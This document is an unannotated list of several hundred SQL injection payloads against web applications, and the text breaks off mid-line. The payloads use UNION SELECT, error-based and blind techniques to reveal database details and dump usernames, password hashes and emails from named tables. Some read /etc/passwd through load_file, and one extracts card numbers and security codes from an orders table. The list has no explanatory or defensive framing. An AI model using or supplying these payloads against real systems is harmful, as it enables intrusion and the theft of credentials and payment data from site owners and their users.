506786875550 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54-- -5069 UNION SELECT load_file(0x2F6574632F706173737764)-- 506 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13 limit 1,1/* 506 Union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mysql.user limit 1,1/* 506' union select 1,concat_ws(0x3a3a,login,pass,group1,name,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users -- -506' union select concat_ws(0x3a,NikName,EMail,Pass) from Forum_Users limit 0,1/* -50708 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users/* -507 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(login,char(58),pass),20,21,22,23,24,25,26,27,28,29,30,31 from city_interactive3.Person -- -507 UNION SELECT 1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,16,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* 5082 union select 1,concat_ws(0x3a,ID,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM erostory_db.adminip-- 508766876870 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14-- 508' and 1=0 union select 1,2,3,4,5,6,7,group_concat(email,0x3a,password),9,10,11,12 from users-- -508 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,user(),version(),database()),22-- -508 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8-- -508 union select 1,2,group_concat(login,0x3a,pass,0x3a,name,0x3a,access),4,5 from users-- -508 union select concat_ws(0x3A3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* 50901 union select 1,user(),3,4,5,database(),7,8,9,10,11,12,13,14-- 50-999.9 union select 1,2,3,concat(0x3a,version(),database(),user()),5,6,7,8,9-- 509 order by 7/* -509' union select 1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8,9,10,11,12,13 from INFORMATION_SCHEMA.tables limit x,1/* 50 and 0 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 50 and 0 union select 1,2,users.*,1,1,1 from users limit 0,1/* 50' AND 0 /*!union*/ /*!select*/ 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 -- 50 and 1=0 Union Select 1,2,3,0x4861636B656420627920494E432E,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 50 and 1=11 union select 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13 from information_schema.tables -- 50 or(1,1)=(select count(*),concat((select concat(version(),database(),user()) from information_schema.tables limit 0,1),0x3a,floor(rand()*2)) from information_schema.tables group by 2 limit 1,1)-- -50 union select 0,1,2,3,4,5,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1),7,8,9,10,11,12,13,14,15,16,17,18/* -50 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(Login,0x3a,Password,0x3a,Email),30,31,32 from std_users -50 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()) ,9,0,11,12,13,14,15,16,17,18,19 50 UNION SELECT 1,2,3,4,5,6,7 LIMIT 1,1/* 50 UNION SELECT 1,2,3,4,5,6,login,8,9 FROM _users LIMIT 0,1 -- -50 UNION SELECT 1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6/* -50 UNION SELECT 1,2,3,4,convert(concat_ws(0x3a,version(),database(),user(),@@version_compile_os) using latin1),6,7,8,9,10-- 50 union select 1,2,3,concat(version(),char(58),char(58),char(58),user()),5 50 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 -- -50' union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,0,11 from admin limit 0,1/* -50 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10 -50 union Select 1,2,table_name,4 from information_schema.tABLES-- -50 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from users/* -50 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11/* -50 union select 1,concat_ws(0x3a,nombre,password),3,4,user() from usuarios -- -50 union select 1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 50' union select 1,version(),3,4,5,6,7,8,9,10,11,12 limit 1,1/* 50' union select 55,2,3,4,user(),6,7,database()/* -50 union select cast(version() as binary),3/* -50 union select concat(username,0x3a,user_password),2,3 from gachet_cms.phpbb_users -- -50 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4-- -50 UNION SELECT concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9-- 50 UNION SELECT null,null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null LIMIT 1,1/* 51002 union select 1,database(),user(),version(),5 from users/* 5101 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12 LIMIT 1,1/* -510 union select 1,convert(concat(version(),0x3a,user()) using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -5115' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- 5115' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 5116-999.9 union select 1,2,3,4,5,6,concat_ws(user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- 511 and 1=0 Union Select 1,UNHEX(HEX(version())) ,3,4,5,6,7 -511 union select 1,2,3,4,5,user_login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users -- -511 union select 1,2,3,version() -- 511 union select 1,concat_ws(0x3a,table_name,table_schema),3 from information_schema.tables/* 51.1' union select concat_ws(0x3a,user(),version(),database()),2 and 'x'='x -511 union select group_concat(table_name),2,3,4,5,6 from information_schema.tables-- -51229203 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* -512 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12 -- -513 union select aes_decrypt(aes_encrypt(concat_ws(0x3a3a,version(),user(),database()),0x71),0x71),2,3,4,5/* -51563 union select 1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='members'/* -51563 union select 1,2,3,4,5,concat_ws(0x203a20,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -5166' uNIon sELEct 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17 -- -516 union select 1,2,3,4,5,6,concat_ws(0x3a,user_id,username,password,email,access),8,9,0,1 from bg_users limit 0,1/* -517344 union select 1,version(),3,4 from mysql.user -- 5179879820 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- 5179 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* -517 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),version(),database()) -517 union select 1,2,group_concat(TABLE_NAME),4,5,6,7,8 from information_schema.tables/* -518 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,(SELECT TOP 1 CHAR(58) CHAR(108) CHAR(117) CHAR(106) CHAR(58) ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) CHAR(58) CHAR(113) CHAR(106) CHAR(117) CHAR(58) FROM master..sysdatabases WHERE ISNULL(name,CHAR(32)) NOT IN (SELECT TOP 136 ISNULL(name,CHAR(32)) FROM master..sysdatabases ORDER BY 1) ORDER BY 1)-- -518 union select 1,2,3,4,5,pass from user /* -518 union select 1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7,8,9/* -5198 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users /* 51-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -519 union select 1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9 from kpro6_user limit 0,1-- 51 and 1=0 union select 1,2,0x5961207665726e756c73796121,concat_ws(0x3a3a3a,user(),database(),version()),5,6,7,0x3a44-- 51' aNd 1=0 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11 -- 51 and 1=2 union select 1,group_concat(Username,0x3a,Password) from users 51 union all select 1,2,3,4,concat_ws(0x3a,username,password),6,7 from jos_users-- -51' union select 1,2,3,4,5,6,7 -- -51 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16/ -51 union select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14,15 from wnbo_users-- -51 union select 1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,22-- -5-1 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7-- -51' union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17 -- -51 union select 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 /* -51 union select 1,2,3,concat(user,0x3a,password,0x3a,Load_File('../../../../../../../../etc/passwd')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 from mysql.user-- -51 union select 1,2,3,concat_ws(0x2F,version(),user(),database()),5,6/* -51 union select 1,2,3,concat_ws(0x3a3a,id,login,pswd),5,6 from medibat_users /* -51 union select 1,2,3,concat_ws(char(58),user(),version(),database()),5,6/* 5-1 union select 1,2,3,group_concat(user,char(58),password),5,6 from admin -51 UNION SELECT 1,2,3,pas,5,log,7,8 from user/* -51 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -51 union select 1,2,concat_ws(0x3a3a,admin_login,admin_pass),4,5,6 from navigator_admin- -51 union select 1,concat(username,0x3a,userpass),3,4,5 from users -51' union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12 -- 51 union select 1,concat_ws(0x3a3a,login,password),3,4,5,6 from admin -- -51 union select 1,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt),3,4,5,6,7,8 from u46830.fib_sa_members_converge-- -51 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -51 union select 1,concat_ws(char(58),user(),version(),database()),3/* -51 union select 1,password from users limit 0,1/* -51 union select 1,user,password,4,5,6,7 from mysql.user/* -51 union select 1,version(),3,4,5,6,7,8 -- -51 union select 1,version(),user(),4,5,6,7,8,9,10,11 from users/* 51 union select cast(usename||chr(58)||passwdasint),null,null,null,null,null,null,null,null,null from pg_user-- -51 union select LOAD_FILE(0x2f6574632f706173737764)/* -51' union select user() -- -5200 union select 1,concat(id,0x3a,name,0x3a,second_name,0x3a,last_name,0x3a,email,0x3a,password,0x3a,url,0x3a,heading),3,4,5,6,7,8,9,10,11,12,13 from authors limit 0,1/* -520 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 FROM accounts/* -520 UnIon SeLect 1,2,3,4,5,concat_ws(0x3a3a,login,password),7,8,9,10,11,12,13,14 from user -- -520 union select 1,2,3,concat_ws(char(58,58),userlogin,userpsswd),5,6,7,8,9 from users limit 100,1/* -522000000000000000000 union select 1,concat_ws(0x3a,login,password),3 from accounts-- -5221 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),7,8,9,10/* -5222 union select 1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,0,1,2,3,4 from admin_login limit 0,1/* 5227-999.9 union select 1,2,3,4,version(),6,7,8,user(),10,database(),12,13,14,15,16,17-- -5237 union select 1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15-- 524 and 1=0 union select 1,database(),version(),4,5,6,7,8,9,10-- -52575 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6-- 5258 UnIon selECt 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 52600 union select 1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12 from mysql.user/* -526 uNIoN sELecT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns -- -526 union select 1,2,3,4,5,6,7,8,9,version(),11/* -526 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 -526 union select 1,2,3,4,password,email,7,username,9,10,11 from members/* -526 union select AES_DECRYPT(AES_ENCRYPT(version(),1),1),2,3,4/* -5272 union select 1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13/* 527 limit 0 union select 1,1,version(),1222,1444,1,1,1,1,1,1/* 527/**/union/**/select/**/1,2 from mysql.user/* -5288 union select 1,2,3,4,5,concat_ws(0x3a,name,pass),7,8,9,10 from user-- 528 union select 1,2,user(),4,5,version(),database()/* -528 UNION SELECT 1,email,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from secur_users limit 1,5 -- 5297 and 1=0 UnIon selECt 1,version(),3,4,5,6,7,8,9,10,11,12,13,14 -- -529 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),16,17,18,19,20,21,22,23,24,25 -529 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7-- 52 and 5=substring((SELECT version()),1,1) -- 52 and 5=substring((version()),1,1) -52 union select -52' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,id,admin_id,password) from rockpub_admin /* -52 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password,0x3a,email),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from user/* 52 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()) -52' union select 1,2,3,4,5,version(),concat_ws(0x3a,user,password),8,9,10,11,12 from mysql.user limit 0,1/* -52 union select 1,2,3,concat(uId,0x3a,0x3a,uFullName,0x3a,0x3a,uEmail,0x3a,0x3a,uPassword),5 FROM tb_users LIMIT 0,1# -52 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16/* 52 union select 1,2,concat_ws(0x3a,login,pass),4,5,6,7,8,9,10,11,12,13,14 from users-- 52 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14 from users-- -52 union select 1,2,group_concat(0x3c62723e,concat_ws(0x203a3a3a20,login,password,access)) from cns_users -- -52 union select 1,2,version(),4,5,6,7,8,9,10,11-- 52 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6 LIMIT 1,1-- -52 union select 1,concat(login,0x3a,heslo),3,4,5,6,7 from admin-- -52 UNION SELECT 1,concat_ws(0x1,id,username,password,email),3,4,5,6,7 FROM users where id=2/* -52' union select 1,concat_ws(0x3a3a,IDADMIN,IDENT,PASS),3,4,5,6,7,8,9,10,11,12 from ADMIN -- -52 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13 from user -52 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -52 union select 1,concat_ws(char(58),user,password),3,4,5 from mysql.user limit 0,10/* -52 UnION SELeCT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 fRom users -- -52 union select 1,username,3,4,5,password,7,8 from user/* -52 UNION SELECT version() -- -5303 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5 -- -5305-1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 -- -5305' union select 1,2,3,4,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19# -5305 union select 1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23-- -5307' union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 530 aNd 1=0 UNION SELECT 1,2,3,4,5,6,7,8,version(),10,11,12 -- 530) and null union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9# 5321 union select 1,2,3,4,5,6,convert(passwd,binary) from admins/* -5324 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 53333 union select 1,concat(Username,0x3a,Password),3,UserId,5,6 from Users 533 and 1=0 UNION SELECT 1,2,version(),4,5 -- 533 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6 limit 1,1/* -534 union select 1,2,3,4,concat_ws(0x3a,user(),version()),6,7,8/* -535' union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8 -- -53663 union select 1,2,3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* 5368769870987 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15-- -536 union select 1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9,0,11,12 from users/* -53798 union select 1,2,3,4,5,6,7,8,9,0,1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,30/* 537 AND 1@i order by table_name LIMIT 1))),@o),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 -- -538 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT CONCAT(TABLE_NAME,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1)),0x71),0x71)/* -5392 UnIon selECt 1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11,12 from information_schema.tables limit 0,1-- -5393 union all select 1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 53970 union select 1,GROUP_CONCAT(ID,0x3a,OrderID,0x3a,Name,0x3a,Address,0x3a,DelAddress,0x3a,0x3a,Telephone,0x3a,Email,0x3a,Comment,0x3a,Currency,0x3a,TotalDelivery,0x3a,PaymentMethod,0x3a,StartDate,0x3a,Expirydate,0x3a,CardNo,0x3a,SecurityNo,0x3a,IssueNo,0x3a,Tax),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from Orders 539 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,version(),43,44,45,46,47,48,49,50,51,52,53,54,55,56,57-- 539 aNd 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- -539 union select 1,2,3,4,5,6,7,8,9,0,11,12,concat_ws(0x3a,version(),database(),user()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- -53 and 1=2 union select 1,2,3,4,5,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),7,8,9,10 -- 53 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,version(),database(),user())),1,63), FLOOR(RAND(0)*2))) -- -53' union select 1,2,3,4 -- -53 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(version(),user(),database()),15,16,17,18,19,20,21,22,23-- -53 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,autId,autArtId,autCoId,autNom,autPrenom),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from auteur -- -53 union select 1,2,3,4,5,6,concat_ws(char(124),user,password) from user limit 0,1/* -53 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7/* 53 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8-- -53 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -53 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15-- -53 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7-- -53 union select 1,2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17-- -53 union select 1,2,concat(version(),0x3a,database(),0x3a,user())/* -53 union select 1,2,concat_ws(0x3A3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -53 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- -53 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87 -53 union select 1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13/* 53 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables -- -53 union select 1,2,user(),database(),5,6,version()/* -53 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -53 union select 1,concat(fs01_username,0x3a,fs01_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from fs01_users-- 53 union select 1,concat(user,0x3a,password,0x3a,file_priv),3,4,5,6 from mysql.user-- 53 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,group_concat(0x0b,username,0x3a,password) from proshop_login-- -53 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11/* -53 union select 1,concat_ws(0x3A3a,version(),database(),user()),3,4,5/* -53 union select 1,concat_ws(0x3a,version(),user(),database()),3,4-- -53 union select 1,concat_ws(0x3,user(),database(),version()),email,phone,5,6 from market limit 4,2/* -53 union select 1,concat_ws(char(58),user(),database(),version()),3,4,5,6,7,8,9 -53 union select 1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,10,11,12,13,14 from mysql.user where user=char(119,119,119) -53 union select 1,group_concat(0x0b,id,0x3a,username,0x3a,password),3,null,5,6,7,8,9,10 from cute_users-- -53 union select 1,login,3,4,5,6,7 from users/* -53 union select 1,USER(),3,4,VERSION(),DATABASE(),7,8,9/* -53 union select 1,user,password,4,version(),6,7,8,9,10,11,12 from mysql.user/* 53 union select concat(user,char(58),passwd) from user limit 1,1 -- -53 union select concat(version(),0x20,database(),0x20,user()),2,3,4-- -5403 union select login,2,3,4,5,password,7,8 from users limit 0,1/* 540 and 1=2 union all select 1,2,3,4,5,concat(emri,char(58),fjalkalimi) from admin/* -540 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -540 union select 1,concat(user(),0x3a,version(),0x3a,database()),password,4,5,6,name,8 from users/* 541000000 UNION SELECT 1,concat_ws(0x3a,admin_fullname,admin_pw,admin_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from phpads_config limit 0,1/* 5416' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/* -54183 union select concat(id,char(58),password) from users limit 0,1/* 541 AND ascii(substring(version(),1,1))=53-- -541 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,0,11,12,13,14,15 -- -541 union select 1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18-- -541 union select version(),2,3,4,5-- -5422 union select 1,2,3,4,5,concat_ws(char(58),user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -5425 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7-- -542 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14-- -542 union select 1,concat_ws(0x3a,session_id,product_id,product_name,product_price,product_quantity,product_sum),3 from shcart limit 1,1/* -543 and 1=2 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- -543 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16 -- 543 union select 1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 limit 1,1/* 5445 and 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables-- -5445 union select concat(version(),file_priv,user),2,3,4 from mysql.user where user=0x6273615f666f72756d-- -5449 union select 1,2,3,4,5,6,7,user,password,user(),11,12,13,14,15,16,17,18 from mysql.user/* -544' union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6 -- -545198 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat_ws(char(58),@@version,user(),database(),@@version_compile_os) -- -545' union select 1,2,3,4,concat_ws(':',version(),user(),database())-- -545 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17-- -545 union select concat(version(),0x20,database(),0x20,user()),2-- 54623875603 union select 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9,10-- -5465 union select 1,2,3,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12,13 from INFORMATION_SCHEMA.COLUMNS-- 547897699030 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a,user(),version(),database()),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67-- -547 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,0,11 -- 547' union select null,null,null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null -- -548 union select 1,unhex(hex(concat_ws(0x3a,user,password))),3,4,5,6,load_file('/etc/passwd'),8,9,0,11,12,13,14,15,16,17,18,19 from mysql.user-- -5491 union select 1,concat_ws(0x3a3a,user_id,username,user_password,user_level) from mf_users where user_level=5 /* -5492 union select 1,2,concat_ws(0x3a3a3a,user,password,file_priv),4,5 from mysql.user -- -5492 UNION SELECT concat(user(),0x3a,database(),0x3a,version())/* -5494 UNION SELECT 0,1,concat_ws(0x0b,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -54 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4 -- 54 and 2=1 union select 1,2,version(),4,5# 54 AND 23=(SELECT COUNT(table_name) FROM information_schema.tables) 54 and substring(@@version,1,1)=5.0 54 union 